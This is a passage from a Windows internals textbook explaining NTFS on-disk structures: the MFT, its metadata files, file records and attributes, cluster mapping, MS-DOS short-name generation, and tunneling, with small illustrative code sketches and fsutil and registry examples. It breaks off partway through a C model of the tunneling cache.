FIGURE 11-30 NTFS data structures. (A process's handle table entries point to file objects; each file object
points to a stream control block for the data attribute or a named stream; the SCBs point to a common file
control block, which points to the file's record in the on-disk master file table.)
NTFS follows several pointers to get from the file object to the location of the file on disk. As
Figure 11-30 shows, a file object, which represents a single call to the open-file system service, points to
a stream control block (SCB) for the file attribute that the caller is trying to read or write. In Figure 11-30,
a process has opened both the unnamed data attribute and a named stream (alternate data attribute)
for the file. The SCBs represent individual file attributes and contain information about how to find
specific attributes within a file. All the SCBs for a file point to a common data structure called a file
control block (FCB). The FCB contains a pointer (actually, an index into the MFT, as explained in the section
"File record numbers" later in this chapter) to the file's record in the disk-based master file table (MFT),
which is described in detail in the following section.
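The pointer chain just described can be sketched with hypothetical record types. This is purely illustrative Python, not the real kernel structures (which are far richer); the point is that every SCB of a file shares one FCB, which carries the MFT index:

```python
from dataclasses import dataclass

@dataclass
class FileControlBlock:
    mft_index: int              # index of the file's record in the MFT

@dataclass
class StreamControlBlock:
    attribute_name: str         # "" for the unnamed data attribute
    fcb: FileControlBlock       # all SCBs of one file share one FCB

@dataclass
class FileObject:
    scb: StreamControlBlock     # one file object per open of a stream

# One file opened twice: once for the unnamed data attribute,
# once for a named stream. Both opens resolve to the same FCB.
fcb = FileControlBlock(mft_index=42)
data_open = FileObject(StreamControlBlock("", fcb))
ads_open = FileObject(StreamControlBlock("notes", fcb))
```

Because both file objects reach the same FCB, any change to the file's on-disk location is visible to every open stream at once.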
NTFS on-disk structure
This section describes the on-disk structure of an NTFS volume, including how disk space is divided and
organized into clusters, how files are organized into directories, how the actual file data and attribute
information is stored on disk, and finally, how NTFS data compression works.
Volumes
The structure of NTFS begins with a volume. A volume corresponds to a logical partition on a disk, and
it's created when you format a disk or part of a disk for NTFS. You can also create a RAID virtual disk
that spans multiple physical disks by using Storage Spaces, which is accessible through the Manage
Storage Spaces control panel snap-in, or by using Storage Spaces commands available from Windows
PowerShell (like the New-StoragePool command, used to create a new storage pool). A comprehensive
list of PowerShell commands for Storage Spaces is available at
https://docs.microsoft.com/en-us/powershell/module/storagespaces/.
A disk can have one volume or several. NTFS handles each volume independently of the others.
Three sample disk configurations for a 2-TB hard disk are illustrated in Figure 11-31.
FIGURE 11-31 Sample disk configurations. (A 2-TB disk formatted as a single 2-TB NTFS volume C:; as a 1-TB
NTFS volume C: plus a 1-TB ReFS volume D:; or as a 1-TB ReFS volume plus a 1-TB exFAT volume.)
A volume consists of a series of files plus any additional unallocated space remaining on the disk
partition. In all FAT file systems, a volume also contains areas specially formatted for use by the file
system. An NTFS or ReFS volume, however, stores all file system data, such as bitmaps and directories,
and even the system bootstrap, as ordinary files.
Note The on-disk format of NTFS volumes on Windows 10 and Windows Server 2019 is
version 3.1, the same as it has been since Windows XP and Windows Server 2003. The version
number of a volume is stored in its $Volume metadata file.
Clusters
The cluster size on an NTFS volume, or the cluster factor, is established when a user formats the volume
with either the format command or the Disk Management MMC snap-in. The default cluster factor
varies with the size of the volume, but it is an integral number of physical sectors, always a power of 2
(1 sector, 2 sectors, 4 sectors, 8 sectors, and so on). The cluster factor is expressed as the number of
bytes in the cluster, such as 512 bytes, 1 KB, 2 KB, and so on.
Internally, NTFS refers only to clusters. (However, NTFS forms low-level volume I/O operations such
that clusters are sector-aligned and have a length that is a multiple of the sector size.) NTFS uses the
cluster as its unit of allocation to maintain its independence from physical sector sizes. This
independence allows NTFS to efficiently support very large disks by using a larger cluster factor or to support
newer disks that have a sector size other than 512 bytes. On a larger volume, use of a larger cluster
factor can reduce fragmentation and speed allocation, at the cost of wasted disk space. (If the cluster size
is 64 KB, and a file is only 16 KB, then 48 KB are wasted.) Both the format command available from the
command prompt and the Format menu option under the All Tasks option on the Action menu in the
Disk Management MMC snap-in choose a default cluster factor based on the volume size, but you can
override this size.
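The space cost of a large cluster factor is easy to quantify: a file's on-disk footprint is its size rounded up to a whole number of clusters. A small Python sketch (a hypothetical helper, not part of any Windows API) reproduces the 64 KB/16 KB example from the text:

```python
def allocated_bytes(file_size, cluster_bytes):
    """Bytes consumed on the volume: NTFS allocates whole clusters."""
    clusters = -(-file_size // cluster_bytes)  # ceiling division
    return clusters * cluster_bytes

# The text's example: a 16 KB file on a 64 KB-cluster volume occupies
# one full cluster, so 48 KB are wasted as slack space.
slack = allocated_bytes(16 * 1024, 64 * 1024) - 16 * 1024
```

The same function shows why small cluster factors suit volumes full of small files, while large factors suit volumes holding a few huge files.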
NTFS refers to physical locations on a disk by means of logical cluster numbers (LCNs). LCNs are
simply the numbering of all clusters from the beginning of the volume to the end. To convert an LCN
to a physical disk address, NTFS multiplies the LCN by the cluster factor to get the physical byte offset
on the volume, as the disk driver interface requires. NTFS refers to the data within a file by means of
virtual cluster numbers (VCNs). VCNs number the clusters belonging to a particular file from 0 through
m. VCNs aren’t necessarily physically contiguous, however; they can be mapped to any number of LCNs
on the volume.
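The two conversions just described can be sketched in Python. This is an illustration only; the run-list representation (starting VCN, starting LCN, length) follows the text's description, not any on-disk format:

```python
def lcn_to_byte_offset(lcn, cluster_bytes):
    # NTFS multiplies the LCN by the cluster factor to get the
    # physical byte offset on the volume.
    return lcn * cluster_bytes

def vcn_to_lcn(vcn, runs):
    # runs: (starting VCN, starting LCN, length-in-clusters) triples.
    # VCNs are contiguous within a file but may map to scattered LCNs.
    for start_vcn, start_lcn, length in runs:
        if start_vcn <= vcn < start_vcn + length:
            return start_lcn + (vcn - start_vcn)
    raise ValueError(f"VCN {vcn} is not mapped")

# A hypothetical fragmented file: VCNs 0-2 live at LCN 1355,
# VCNs 3-7 live at LCN 1588.
runs = [(0, 1355, 3), (3, 1588, 5)]
```

Note that within each run the mapping is a simple offset; fragmentation only shows up as the jump between runs.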
Master file table
In NTFS, all data stored on a volume is contained in files, including the data structures used to locate
and retrieve files, the bootstrap data, and the bitmap that records the allocation state of the entire
volume (the NTFS metadata). Storing everything in files allows the file system to easily locate and maintain
the data, and each separate file can be protected by a security descriptor. In addition, if a particular
part of the disk goes bad, NTFS can relocate the metadata files to prevent the disk from becoming
inaccessible.
The MFT is the heart of the NTFS volume structure. The MFT is implemented as an array of file
records. The size of each file record can be 1 KB or 4 KB, as defined at volume-format time, and depends
on the type of the underlying physical medium: new physical disks that have a 4 KB native sector size
and tiered disks generally use 4 KB file records, while older disks that have a 512-byte sector size use
1 KB file records. The size of each MFT entry does not depend on the cluster size and can be overridden
at volume-format time through the Format /l command. (The structure of a file record is described in
the "File records" section later in this chapter.) Logically, the MFT contains one record for each file on
the volume, including a record for the MFT itself. In addition to the MFT, each NTFS volume includes
a set of metadata files containing the information that is used to implement the file system structure.
Each of these NTFS metadata files has a name that begins with a dollar sign ($) and is hidden. For
example, the file name of the MFT is $MFT. The rest of the files on an NTFS volume are normal user files
and directories, as shown in Figure 11-32.
Usually, each MFT record corresponds to a different file. If a file has a large number of attributes or
becomes highly fragmented, however, more than one record might be needed for a single file. In such
cases, the first MFT record, which stores the locations of the others, is called the base file record.
FIGURE 11-32 File records for NTFS metadata files in the MFT. (The first entries are reserved for the NTFS
metadata files: $MFT, $MFTMirr (MFT mirror), $LogFile, the root directory \, $Volume, $AttrDef, $BitMap,
$Boot, $BadClus, $Extend, $Secure, and $UpCase. Later entries, after a range of unused records, hold the
extended metadata: $Extend\$Quota, $Extend\$ObjId, $Extend\$Reparse, $Extend\$Deleted, and
$Extend\$RmMetadata with its $Repair, $Txf, and $TxfLog contents, the latter containing $Tops,
$TxfLog.blf, $TxfLogContainer00000000000000000001, and $TxfLogContainer00000000000000000002.)
When it first accesses a volume, NTFS must mount it, that is, read metadata from the disk and
construct internal data structures so that it can process application file system accesses. To mount the
volume, NTFS looks in the volume boot record (VBR) (located at LCN 0), which contains a data structure
called the boot parameter block (BPB), to find the physical disk address of the MFT. The MFT's file record
is the first entry in the table; the second file record points to a file located in the middle of the disk called
the MFT mirror (file name $MFTMirr) that contains a copy of the first four rows of the MFT. This partial
copy of the MFT is used to locate metadata files if part of the MFT file can't be read for some reason.
Once NTFS finds the file record for the MFT, it obtains the VCN-to-LCN mapping information in the
file record’s data attribute and stores it into memory. Each run (runs are explained later in this chapter
in the section “Resident and nonresident attributes”) has a VCN-to-LCN mapping and a run length
because that’s all the information necessary to locate the LCN for any VCN. This mapping information
tells NTFS where the runs containing the MFT are located on the disk. NTFS then processes the MFT
records for several more metadata files and opens the files. Next, NTFS performs its file system recovery
operation (described in the section "Recovery" later in this chapter), and finally, it opens its remaining
metadata files. The volume is now ready for user access.
Note For the sake of clarity, the text and diagrams in this chapter depict a run as including
a VCN, an LCN, and a run length. NTFS actually compresses this information on disk into an
LCN/next-VCN pair. Given a starting VCN, NTFS can determine the length of a run by
subtracting the starting VCN from the next VCN.
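Under that on-disk encoding, the full (VCN, LCN, length) form can be recovered by walking the pairs in order. A minimal Python sketch, with the tuple layout assumed purely for illustration:

```python
def expand_runs(start_vcn, pairs):
    # pairs: (LCN, next VCN) as compressed on disk. Each run's length
    # is its next VCN minus its starting VCN, and each run starts where
    # the previous one ended.
    runs, vcn = [], start_vcn
    for lcn, next_vcn in pairs:
        runs.append((vcn, lcn, next_vcn - vcn))
        vcn = next_vcn
    return runs
```

The compression works because VCNs within a file are contiguous, so storing only each run's ending boundary loses no information.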
As the system runs, NTFS writes to another important metadata file, the log file (file name $LogFile).
NTFS uses the log file to record all operations that affect the NTFS volume structure, including file
creation or any commands, such as copy, that alter the directory structure. The log file is used to recover an
NTFS volume after a system failure and is also described in the "Recovery" section.
Another entry in the MFT is reserved for the root directory (also known as \; for example, C:\). Its file
record contains an index of the files and directories stored in the root of the NTFS directory structure.
When NTFS is first asked to open a file, it begins its search for the file in the root directory’s file record.
After opening a file, NTFS stores the file’s MFT record number so that it can directly access the file’s
MFT record when it reads and writes the file later.
NTFS records the allocation state of the volume in the bitmap file (file name $BitMap). The data
attribute for the bitmap file contains a bitmap, each of whose bits represents a cluster on the volume,
identifying whether the cluster is free or has been allocated to a file.
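Testing one cluster's state then reduces to indexing a single bit. A sketch, assuming the common least-significant-bit-first layout within each byte (the bitmap contents here are hypothetical):

```python
def cluster_allocated(bitmap, lcn):
    # One bit per cluster; a set bit means the cluster is allocated.
    # Assumes LSB-first bit order within each byte.
    return bool(bitmap[lcn // 8] & (1 << (lcn % 8)))

# Hypothetical one-byte bitmap: clusters 0 and 3 allocated, rest free.
bitmap = bytes([0b00001001])
```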
The security file (file name $Secure) stores the volume-wide security descriptor database. NTFS files
and directories have individually settable security descriptors, but to conserve space, NTFS stores the
settings in a common file, which allows files and directories that have the same security settings to
reference the same security descriptor. In most environments, entire directory trees have the same
security settings, so this optimization provides a significant saving of disk space.
Another system file, the boot file (file name $Boot), stores the Windows bootstrap code if the volume
is a system volume. On nonsystem volumes, there is code that displays an error message on the screen
if an attempt is made to boot from that volume. For the system to boot, the bootstrap code must be
located at a specific disk address so that the Boot Manager can find it. During formatting, the format
command defines this area as a file by creating a file record for it. All files are in the MFT, and all clusters
are either free or allocated to a file; there are no hidden files or clusters in NTFS, although some files
(metadata) are not visible to users. The boot file as well as the NTFS metadata files can be individually
protected by means of the security descriptors that are applied to all Windows objects. Using this
"everything on the disk is a file" model also means that the bootstrap can be modified by normal file I/O,
although the boot file is protected from editing.
NTFS also maintains a bad-cluster file (file name $BadClus) for recording any bad spots on the disk
volume and a file known as the volume file (file name $Volume), which contains the volume name, the
version of NTFS for which the volume is formatted, and a number of flag bits that indicate the state and
health of the volume, such as a bit that indicates that the volume is corrupt and must be repaired by
the Chkdsk utility. (The Chkdsk utility is covered in more detail later in the chapter.) The uppercase file
(file name $UpCase) includes a translation table between lowercase and uppercase characters. NTFS
maintains a file containing an attribute definition table (file name $AttrDef) that defines the attribute
types supported on the volume and indicates whether they can be indexed, recovered during a system
recovery operation, and so on.
Note Figure 11-32 shows the master file table of an NTFS volume and indicates the specific
entries in which the metadata files are located. It is worth mentioning that file records at
positions less than 16 are guaranteed to be fixed. Metadata files located at entries greater than
16 are subject to the order in which NTFS creates them. Indeed, the format tool doesn't
create any metadata file above position 16; this is the duty of the NTFS file system driver while
mounting the volume for the first time (after the formatting has been completed). The order
of the metadata files generated by the file system driver is not guaranteed.
NTFS stores several metadata files in the extensions (directory name $Extend) metadata directory,
including the object identifier file (file name $ObjId), the quota file (file name $Quota), the change
journal file (file name $UsnJrnl), the reparse point file (file name $Reparse), the Posix delete support
directory ($Deleted), and the default resource manager directory (directory name $RmMetadata). These
files store information related to extended features of NTFS. The object identifier file stores file object
IDs, the quota file stores quota limit and behavior information on volumes that have quotas enabled,
the change journal file records file and directory changes, and the reparse point file stores information
about which files and directories on the volume include reparse point data.
The Posix delete directory ($Deleted) contains files, invisible to the user, that have been
deleted using the new Posix semantic. Files deleted using the Posix semantic are moved into this
directory when the application that originally requested the file deletion closes the file handle.
Other applications that may still have a valid reference to the file continue to run, while the file's name
is deleted from the namespace. Detailed information about Posix deletion was provided in the
previous section.
The default resource manager directory contains directories related to transactional NTFS (TxF)
support, including the transaction log directory (directory name $TxfLog), the transaction isolation
directory (directory name $Txf), and the transaction repair directory (file name $Repair). The
transaction log directory contains the TxF base log file (file name $TxfLog.blf) and any number of log container
files, depending on the size of the transaction log, but it always contains at least two: one for the Kernel
Transaction Manager (KTM) log stream (file name $TxfLogContainer00000000000000000001), and
one for the TxF log stream (file name $TxfLogContainer00000000000000000002). The transaction log
directory also contains the TxF old page stream (file name $Tops), which we'll describe later.
EXPERIMENT: Viewing NTFS information
You can use the built-in Fsutil.exe command-line program to view information about an NTFS
volume, including the placement and size of the MFT and MFT zone:
d:\>fsutil fsinfo ntfsinfo d:
NTFS Volume Serial Number :       0x48323940323933f2
NTFS Version :                    3.1
LFS Version :                     2.0
Number Sectors :                  0x000000011c5f6fff
Total Clusters :                  0x00000000238bedff
Free Clusters :                   0x000000001a6e5925
Total Reserved :                  0x00000000000011cd
Bytes Per Sector :                512
Bytes Per Physical Sector :       4096
Bytes Per Cluster :               4096
Bytes Per FileRecord Segment :    4096
Clusters Per FileRecord Segment : 1
Mft Valid Data Length :           0x0000000646500000
Mft Start Lcn :                   0x00000000000c0000
Mft2 Start Lcn :                  0x0000000000000002
Mft Zone Start :                  0x00000000069f76e0
Mft Zone End :                    0x00000000069f7700
Max Device Trim Extent Count :    4294967295
Max Device Trim Byte Count :      0x10000000
Max Volume Trim Extent Count :    62
Max Volume Trim Byte Count :      0x10000000
Resource Manager Identifier :     81E83020-E6FB-11E8-B862-D89EF33A38A7
In this example, the D: volume uses 4 KB file records (MFT entries), on a 4 KB native sector size
disk (which emulates old 512-byte sectors) and uses 4 KB clusters.
File record numbers
A file on an NTFS volume is identified by a 64-bit value called a file record number, which consists of a
file number and a sequence number. The file number corresponds to the position of the file’s file record
in the MFT minus 1 (or to the position of the base file record minus 1 if the file has more than one file
record). The sequence number, which is incremented each time an MFT file record position is reused,
enables NTFS to perform internal consistency checks. A file record number is illustrated in Figure 11-33.
FIGURE 11-33 File record number. (The file number occupies bits 0-47; the sequence number occupies
bits 48-63.)
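Following the layout in Figure 11-33 (48-bit file number in the low bits, 16-bit sequence number in the high bits), the two parts can be packed and split with simple shifts. A hedged Python sketch, not a Windows API:

```python
FILE_NUMBER_BITS = 48
FILE_NUMBER_MASK = (1 << FILE_NUMBER_BITS) - 1

def make_file_record_number(file_number, sequence):
    # Sequence number in bits 48-63, file number in bits 0-47.
    return (sequence << FILE_NUMBER_BITS) | (file_number & FILE_NUMBER_MASK)

def split_file_record_number(frn):
    # Returns (file number, sequence number).
    return frn & FILE_NUMBER_MASK, frn >> FILE_NUMBER_BITS
```

When an MFT position is reused, only the sequence number changes, so a stale file record number no longer matches the current record and the inconsistency is detectable.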
File records
Instead of viewing a file as just a repository for textual or binary data, NTFS stores files as a collection
of attribute/value pairs, one of which is the data it contains (called the unnamed data attribute). Other
attributes that compose a file include the file name, time stamp information, and possibly additional
named data attributes. Figure 11-34 illustrates an MFT record for a small file.
FIGURE 11-34 MFT record for a small file. (The record holds the standard information, file name, and data
attributes, among others.)
Each file attribute is stored as a separate stream of bytes within a file. Strictly speaking, NTFS doesn't
read and write files; it reads and writes attribute streams. NTFS supplies these attribute operations:
create, delete, read (byte range), and write (byte range). The read and write services normally operate on
the file's unnamed data attribute. However, a caller can specify a different data attribute by using the
named data stream syntax.
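The named data stream syntax appends the stream name to the file name with a colon. A tiny helper (hypothetical, for illustration only) that builds such a path:

```python
def stream_path(file_path, stream=None):
    # "book.txt" addresses the unnamed data attribute;
    # "book.txt:notes" addresses the named data stream "notes".
    return file_path if stream is None else f"{file_path}:{stream}"
```

On an NTFS volume, a path built this way can be passed to ordinary file APIs to read or write the alternate stream instead of the default data attribute.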
Table 11-6 lists the attributes for files on an NTFS volume. (Not all attributes are present for every
file.) Each attribute in the NTFS file system can be unnamed or can have a name. An example of a
named attribute is $LOGGED_UTILITY_STREAM, which is used for various purposes by different
NTFS components. Table 11-7 lists the possible $LOGGED_UTILITY_STREAM attribute names and their
respective purposes.
TABLE 11-6 Attributes for NTFS files

| Attribute | Attribute Type Name | Resident? | Description |
| --- | --- | --- | --- |
| Volume information | $VOLUME_INFORMATION, $VOLUME_NAME | Always, Always | These attributes are present only in the $Volume metadata file. They store volume version and label information. |
| Standard information | $STANDARD_INFORMATION | Always | File attributes such as read-only, archive, and so on; time stamps, including when the file was created or last modified. |
| File name | $FILE_NAME | Maybe | The file's name in Unicode 1.0 characters. A file can have multiple file name attributes, as it does when a hard link to a file exists or when a file with a long name has an automatically generated short name for access by MS-DOS and 16-bit Windows applications. |
| Security descriptor | $SECURITY_DESCRIPTOR | Maybe | This attribute is present for backward compatibility with previous versions of NTFS and is rarely used in the current version of NTFS (3.1). NTFS stores almost all security descriptors in the $Secure metadata file, sharing descriptors among files and directories that have the same settings. Previous versions of NTFS stored private security descriptor information with each file and directory. Some files still include a $SECURITY_DESCRIPTOR attribute, such as $Boot. |
| Data | $DATA | Maybe | The contents of the file. In NTFS, a file has one default unnamed data attribute and can have additional named data attributes; that is, a file can have multiple data streams. A directory has no default data attribute but can have optional named data attributes. Named data streams can be used even for particular system purposes. For example, the Storage Reserve Area Table ($SRAT) stream is used by the Storage Service for creating space reservations on a volume. This attribute is applied only on the $Bitmap metadata file. Storage Reserves are described later in this chapter. |
| Index root, index allocation | $INDEX_ROOT, $INDEX_ALLOCATION | Always, Never | Three attributes used to implement B-tree data structures used by directories, security, quota, and other metadata files. |
| Attribute list | $ATTRIBUTE_LIST | Maybe | A list of the attributes that make up the file and the file record number of the MFT entry where each attribute is located. This attribute is present when a file requires more than one MFT file record. |
| Index Bitmap | $BITMAP | Maybe | This attribute is used for different purposes: for nonresident directories (where an $INDEX_ALLOCATION always exists), the bitmap records which 4 KB-sized index blocks are already in use by the B-tree and which are free for future use as the B-tree grows; in the MFT there is an unnamed "Bitmap" attribute that tracks which MFT segments are in use and which are free for future use by new files or by existing files that require more space. |
| Object ID | $OBJECT_ID | Always | A 16-byte identifier (GUID) for a file or directory. The link-tracking service assigns object IDs to shell shortcut and OLE link source files. NTFS provides APIs so that files and directories can be opened with their object ID rather than their file name. |
| Reparse information | $REPARSE_POINT | Maybe | This attribute stores a file's reparse point data. NTFS junctions and mount points include this attribute. |
| Extended attributes | $EA, $EA_INFORMATION | Maybe, Always | Extended attributes are name/value pairs and aren't normally used but are provided for backward compatibility with OS/2 applications. |
| Logged utility stream | $LOGGED_UTILITY_STREAM | Maybe | This attribute type can be used for various purposes by different NTFS components. See Table 11-7 for more details. |
TABLE 11-7 $LOGGED_UTILITY_STREAM attribute

| Attribute | Attribute Type Name | Resident? | Description |
| --- | --- | --- | --- |
| Encrypted File Stream | $EFS | Maybe | EFS stores data in this attribute that's used to manage a file's encryption, such as the encrypted version of the key needed to decrypt the file and a list of users who are authorized to access the file. |
| Online encryption backup | $EfsBackup | Maybe | The attribute is used by the EFS Online encryption to store chunks of the original encrypted data stream. |
| Transactional NTFS Data | $TXF_DATA | Maybe | When a file or directory becomes part of a transaction, TxF also stores transaction data in the $TXF_DATA attribute, such as the file's unique transaction ID. |
| Desired Storage Class | $DSC | Resident | The desired storage class is used for "pinning" a file to a preferred storage tier. See the "NTFS support for tiered volumes" section for more details. |
Table 11-6 shows attribute names; however, attributes actually correspond to numeric type codes,
which NTFS uses to order the attributes within a file record. The file attributes in an MFT record are
ordered by these type codes (numerically in ascending order), with some attribute types appearing
more than once—if a file has multiple data attributes, for example, or multiple file names. All possible
attribute types (and their names) are listed in the $AttrDef metadata file.
Each attribute in a file record is identified with its attribute type code and has a value and an op-
tional name. An attribute's value is the byte stream composing the attribute. For example, the value of
the $FILE_NAME attribute is the file's name; the value of the $DATA attribute is whatever bytes the user
stored in the file.
Most attributes never have names, although the index-related attributes and the $DATA attribute
often do. Names distinguish between multiple attributes of the same type that a file can include. For
example, a file that has a named data stream has two $DATA attributes: an unnamed $DATA attribute
storing the default unnamed data stream, and a named $DATA attribute having the name of the alter-
nate stream and storing the named stream's data.
File names
Both NTFS and FAT allow each file name in a path to be as many as 255 characters long. File names can
contain Unicode characters as well as multiple periods and embedded spaces. However, the FAT file
system supplied with MS-DOS is limited to 8 (non-Unicode) characters for its file names, followed by
a period and a 3-character extension. Figure 11-35 provides a visual representation of the different file
namespaces Windows supports and shows how they intersect.
Windows Subsystem for Linux (WSL) requires the biggest namespace of all the application execu-
tion environments that Windows supports, and therefore the NTFS namespace is equivalent to the
WSL namespace. WSL can create names that aren’t visible to Windows and MS-DOS applications,
including names with trailing periods and trailing spaces. Ordinarily, creating a file using the large
POSIX namespace isn’t a problem because you would do that only if you intended WSL applications
to use that file.
FIGURE 11-35 Windows file namespaces. [The figure shows three nested namespaces. WSL (largest): "TrailingDots...", "TrailingSpaces ", "SameNameDifferentCase", "samenamedifferentcase". Windows subsystem: "LongFileName", "UnicodeName.Φ∆ΠΛ", "File.Name.With.Dots", "File.Name2.With.Dots", "Name With Embedded Spaces", ".BeginningDot". MS-DOS–Windows clients (smallest): "EIGHTCHR.123", "CASEBLND.TYP".]
The relationship between 32-bit Windows applications and MS-DOS and 16-bit Windows applica-
tions is a much closer one, however. The Windows area in Figure 11-35 represents file names that the
Windows subsystem can create on an NTFS volume but that MS-DOS and 16-bit Windows applications
can’t see. This group includes file names longer than the 8.3 format of MS-DOS names, those contain-
ing Unicode (international) characters, those with multiple period characters or a beginning period,
and those with embedded spaces. For compatibility reasons, when a file is created with such a name,
NTFS automatically generates an alternate, MS-DOS-style file name for the file. Windows displays these
short names when you use the /x option with the dir command.
The MS-DOS file names are fully functional aliases for the NTFS files and are stored in the same
directory as the long file names. The MFT record for a file with an autogenerated MS-DOS file name is
shown in Figure 11-36.
FIGURE 11-36 MFT file record with an MS-DOS file name attribute. [The record holds standard information, the NTFS file name, the autogenerated MS-DOS file name (the new file name attribute), and data.]
The NTFS name and the generated MS-DOS name are stored in the same file record and therefore
refer to the same file. The MS-DOS name can be used to open, read from, write to, or copy the file. If
a user renames the file using either the long file name or the short file name, the new name replaces
both the existing names. If the new name isn’t a valid MS-DOS name, NTFS generates another MS-DOS
name for the file. (Note that NTFS only generates MS-DOS-style file names for the first file name.)
Note Hard links are implemented in a similar way. When a hard link to a file is created, NTFS
adds another file name attribute to the file’s MFT file record, and adds an entry in the Index
Allocation attribute of the directory in which the new link resides. The two situations differ in
one regard, however. When a user deletes a file that has multiple names (hard links), the file
record and the file remain in place. The file and its record are deleted only when the last file
name (hard link) is deleted. If a file has both an NTFS name and an autogenerated MS-DOS
name, however, a user can delete the file using either name.
Here’s the algorithm NTFS uses to generate an MS-DOS name from a long file name. The algo-
rithm is actually implemented in the kernel function RtlGenerate8dot3Name and can change in future
Windows releases. The latter function is also used by other drivers, such as CDFS, FAT, and third-party
file systems:
1. Remove from the long name any characters that are illegal in MS-DOS names, including spaces and Unicode characters. Remove preceding and trailing periods. Remove all other embedded periods, except the last one.
2. Truncate the string before the period (if present) to six characters (it may already be six or fewer because this algorithm is applied when any character that is illegal in MS-DOS is present in the name). If it is two or fewer characters, generate and concatenate a four-character hex checksum string. Append the string ~n (where n is a number, starting with 1, that is used to distinguish different files that truncate to the same name). Truncate the string after the period (if present) to three characters.
3. Put the result in uppercase letters. MS-DOS is case-insensitive, and this step guarantees that NTFS won't generate a new name that differs from the old name only in case.
4. If the generated name duplicates an existing name in the directory, increment the ~n string. If n is greater than 4, and a checksum was not concatenated already, truncate the string before the period to two characters and generate and concatenate a four-character hex checksum string.
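A simplified sketch of these steps in C follows. It is illustrative only: it treats just spaces as illegal characters, omits the hex-checksum fallback in steps 2 and 4, and takes the collision counter n from the caller instead of probing the directory:

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Simplified sketch of the 8.3 short-name steps above. Only spaces are
   treated as illegal characters, the hex-checksum fallback is omitted,
   and the collision counter n is supplied by the caller. */
static void make_short_name(const char *longname, int n, char *out, size_t outsz)
{
    char clean[256];
    size_t len = 0;

    /* Step 1: drop illegal characters (just spaces here) and leading periods. */
    const char *p = longname;
    while (*p == '.')
        p++;
    for (; *p && len < sizeof(clean) - 1; p++)
        if (*p != ' ')
            clean[len++] = *p;
    clean[len] = '\0';
    while (len > 0 && clean[len - 1] == '.')    /* drop trailing periods */
        clean[--len] = '\0';

    /* Keep only the last embedded period. */
    char base[256], ext[8] = "";
    const char *last = strrchr(clean, '.');
    size_t b = 0;
    for (size_t i = 0; i < len; i++)
        if (clean[i] != '.' || &clean[i] == last)
            base[b++] = clean[i];
    base[b] = '\0';

    char *dot = strrchr(base, '.');
    if (dot) {
        snprintf(ext, sizeof(ext), "%.3s", dot + 1);  /* extension -> 3 chars */
        *dot = '\0';
    }

    /* Step 2: truncate the base to six characters and append ~n. */
    char stem[32];
    snprintf(stem, sizeof(stem), "%.6s~%d", base, n);

    /* Step 3: uppercase the result (MS-DOS is case-insensitive). */
    if (ext[0])
        snprintf(out, outsz, "%s.%s", stem, ext);
    else
        snprintf(out, outsz, "%s", stem);
    for (char *q = out; *q; q++)
        *q = (char)toupper((unsigned char)*q);
}
```

With n = 1 this reproduces several of the Table 11-8 results; for example, File.Name.With.Dots becomes FILENA~1.DOT.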
Table 11-8 shows the long Windows file names from Figure 11-35 and their NTFS-generated MS-DOS
versions. The current algorithm and the examples in Figure 11-35 should give you an idea of what NTFS-
generated MS-DOS-style file names look like.
Note Since Windows 8.1, by default all NTFS nonbootable volumes have short
name generation disabled. You can disable short name generation even in older ver-
sions of Windows by setting HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\
NtfsDisable8dot3NameCreation in the registry to a DWORD value of 1 and restarting the
machine. This could potentially break compatibility with older applications, though.
TABLE 11-8 NTFS-generated file names

| Windows Long Name | NTFS-Generated Short Name |
| --- | --- |
| LongFileName | LONGFI~1 |
| UnicodeName.Φ∆ΠΛ | UNICOD~1 |
| File.Name.With.Dots | FILENA~1.DOT |
| File.Name2.With.Dots | FILENA~2.DOT |
| File.Name3.With.Dots | FILENA~3.DOT |
| File.Name4.With.Dots | FILENA~4.DOT |
| File.Name5.With.Dots | FIF596~1.DOT |
| Name With Embedded Spaces | NAMEWI~1 |
| .BeginningDot | BEGINN~1 |
| 25.two characters | 255440~1.TWO |
| © | 6E2D~1 |
Tunneling
NTFS uses the concept of tunneling to allow compatibility with older programs that depend on the file
system to cache certain file metadata for a period of time even after the file is gone, such as when it
has been deleted or renamed. With tunneling, any new file created with the same name as the original
file, and within a certain period of time, will keep some of the same metadata. The idea is to replicate
behavior expected by MS-DOS programs when using the safe save programming method, in which
modified data is copied to a temporary file, the original file is deleted, and then the temporary file is
renamed to the original name. The expected behavior in this case is that the renamed temporary file
should appear to be the same as the original file; otherwise, the creation time would continuously
update itself with each modification (which is how the modified time is used).
NTFS uses tunneling so that when a file name is removed from a directory, its long name and short
name, as well as its creation time, are saved into a cache. When a new file is added to a directory, the
cache is searched to see whether there is any tunneled data to restore. Because these operations apply
to directories, each directory instance has its own cache, which is deleted if the directory is removed.
NTFS will use tunneling for the following series of operations if the names used result in the deletion
and re-creation of the same file name:
- Delete + Create
- Delete + Rename
- Rename + Create
- Rename + Rename
By default, NTFS keeps the tunneling cache for 15 seconds, although you can modify this time-
out by creating a new value called MaximumTunnelEntryAgeInSeconds in the HKLM\SYSTEM\
CurrentControlSet\Control\FileSystem registry key. Tunneling can also be completely disabled by
creating a new value called MaximumTunnelEntries and setting it to 0; however, this will cause older
applications to break if they rely on the compatibility behavior. On NTFS volumes that have short name
generation disabled (see the previous section), tunneling is disabled by default.
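As a .reg fragment, raising the timeout to 60 seconds (or disabling tunneling outright) looks like this; the dword values shown are illustrative:

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
; Raise the tunneling cache timeout from the default 15 s to 60 s (0x3c).
"MaximumTunnelEntryAgeInSeconds"=dword:0000003c

; Alternatively, disable tunneling entirely (may break older applications):
; "MaximumTunnelEntries"=dword:00000000
```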
You can see tunneling in action with the following simple experiment in the command prompt:
1. Create a file called file1.
2. Wait for more than 15 seconds (the default tunnel cache timeout).
3. Create a file called file2.
4. Perform a dir /TC. Note the creation times.
5. Rename file1 to file.
6. Rename file2 to file1.
7. Perform a dir /TC. Note that the creation times are identical.
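The cache behavior the experiment demonstrates can be modeled in a few lines of C. This toy model is a sketch under stated assumptions, not NTFS's actual implementation: it remembers the creation time of a removed name and hands it back only if the same name reappears within the 15-second window:

```c
#include <string.h>
#include <time.h>

#define TUNNEL_AGE   15   /* seconds, the default cache timeout */
#define TUNNEL_SLOTS 16

/* Toy model of the per-directory tunneling cache. */
struct tunnel_entry {
    char   name[64];
    time_t create_time;   /* the tunneled metadata */
    time_t removed_at;    /* when the name left the directory */
    int    used;
};

static struct tunnel_entry cache[TUNNEL_SLOTS];

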